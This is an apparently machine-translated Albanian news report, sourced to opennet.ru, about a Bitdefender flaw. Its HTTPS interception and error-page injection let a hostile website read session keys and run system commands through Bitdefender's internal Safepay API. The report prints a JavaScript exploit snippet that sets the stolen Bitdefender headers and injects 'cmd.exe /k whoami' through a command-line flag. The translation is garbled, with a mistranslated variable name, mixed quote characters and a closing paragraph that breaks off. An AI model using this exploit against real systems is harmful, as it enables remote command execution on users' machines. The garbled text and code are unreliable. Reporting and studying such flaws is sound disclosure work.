Vladimir Palant, krijuesi i Adblock Plus,
Shkaku i problemit është se antivirusi Bitdefender kryen përgjimin lokal të trafikut HTTPS duke zëvendësuar certifikatën origjinale TLS të faqes. Në sistemin e klientit është instaluar një certifikatë shtesë rrënjësore, e cila bën të mundur fshehjen e funksionimit të sistemit të inspektimit të trafikut të përdorur. Antivirusi futet në trafikun e mbrojtur dhe fut kodin e tij JavaScript në disa faqe për të zbatuar funksionin e Kërkimit të Sigurt, dhe në rast të problemeve me certifikatën e lidhjes së sigurt, ai zëvendëson faqen e gabimit të kthyer me të tijën. Meqenëse faqja e re e gabimit shërbehet në emër të serverit që hapet, faqet e tjera në atë server kanë akses të plotë në përmbajtjen e futur nga Bitdefender.
Kur hapni një sajt të kontrolluar nga një sulmues, ai sajt mund të dërgojë një XMLHttpRequest dhe të shtirë probleme me certifikatën HTTPS kur përgjigjet, gjë që do të çojë në kthimin e një faqe gabimi të falsifikuar nga Bitdefender. Meqenëse faqja e gabimit hapet në kontekstin e domenit të sulmuesit, ai mund të lexojë përmbajtjen e faqes së falsifikuar me parametrat Bitdefender. Faqja e ofruar nga Bitdefender përmban gjithashtu një çelës sesioni që ju lejon të përdorni API-në e brendshme të Bitdefender për të nisur një seancë të veçantë të shfletuesit Safepay, duke specifikuar flamuj arbitrare të linjës së komandës dhe për të nisur çdo komandë sistemi duke përdorur "--utility-cmd-prefiksin" flamuri. Një shembull i një shfrytëzimi (param1 dhe param2 janë vlerat e marra nga faqja e gabimit):
var kërkesë = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Kujtojmë se një studim i kryer në vitin 2017
Vetëm 11 nga 26 produktet ofruan paketa aktuale të shifrave. 5 sisteme nuk kanë verifikuar certifikatat (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produktet Kaspersky Internet Security dhe Total Security iu nënshtruan sulmeve
Burimi: opennet.ru